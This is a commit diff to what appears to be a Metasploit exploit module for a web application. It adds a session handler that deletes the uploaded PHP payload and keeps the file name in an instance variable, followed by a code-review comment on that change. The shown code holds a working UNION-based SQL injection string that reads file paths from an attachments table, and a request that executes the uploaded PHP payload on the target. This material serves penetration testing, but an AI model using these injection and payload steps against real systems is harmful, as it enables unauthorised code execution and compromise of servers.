ranking changed plus on_new_session handler added

unstable
jvazquez-r7 2012-08-13 19:29:13 +02:00
parent 468030786f
commit d6b28dc44d
1 changed files with 18 additions and 8 deletions


@ -8,7 +8,7 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
@ -131,6 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm("#{@token}.php")
else
client.shell_command_token("rm #{@token}.php")
end
end
def exploit def exploit
base = target_uri.path base = target_uri.path
@ -205,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => "#{base}upload_area/#{table}/#{id}/" 'uri' => "#{base}upload_area/#{table}/#{id}/"
}) })
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
token = $1 @token = $1
print_good("#{@peer} - Successfully retrieved file name (#{token})") print_good("#{@peer} - Successfully retrieved file name (#{@token})")
else else
print_error("#{@peer} - Could not retrieve file name from directory index.") print_error("#{@peer} - Could not retrieve file name from directory index.")
end end
@ -217,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# attempt to retrieve real file name from the database # attempt to retrieve real file name from the database
if token.nil? if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.") print_status("#{@peer} - Retrieving real file name from the database.")
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin begin
@ -227,8 +237,8 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'], 'cookie' => datastore['COOKIE'],
}) })
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
token = $1 @token = $1
print_good("#{@peer} - Successfully retrieved file name (#{token})") print_good("#{@peer} - Successfully retrieved file name (#{@token})")
else else
print_error("#{@peer} - Could not retrieve file name from the database.") print_error("#{@peer} - Could not retrieve file name from the database.")
return return
@ -240,11 +250,11 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{token}.php)") print_status("#{@peer} - Executing payload (#{@token}.php)")
begin begin
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{token}.php" 'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{@peer} - Connection failed")
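Review bot: Moving `token` to `@token` changes its lifetime: the old local was nil at the start of every `exploit` call, while the instance variable keeps whatever an earlier run on the same object stored, so the `if @token.nil?` fallback to the database lookup can be skipped with a stale name. None of the visible hunks reset it, so unless that happens in lines not shown, add `@token = nil` at the top of `exploit`. In `on_new_session`, both removal calls pass the bare relative name `#{@token}.php`, which presumably relies on the session's working directory being the upload directory; a comment such as `# assumes the session starts in the directory holding the uploaded file` would record that. A failed removal is also not reported, so wrapping the two calls in a `rescue` that emits `print_warning("#{@peer} - Could not remove #{@token}.php, delete it manually")` would tell the tester that the uploaded file is still on the system under test. The bodies of `exploit` and of the class continue outside these hunks.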